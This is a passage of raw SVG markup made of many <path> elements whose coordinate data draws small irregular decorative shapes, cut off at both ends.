d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path 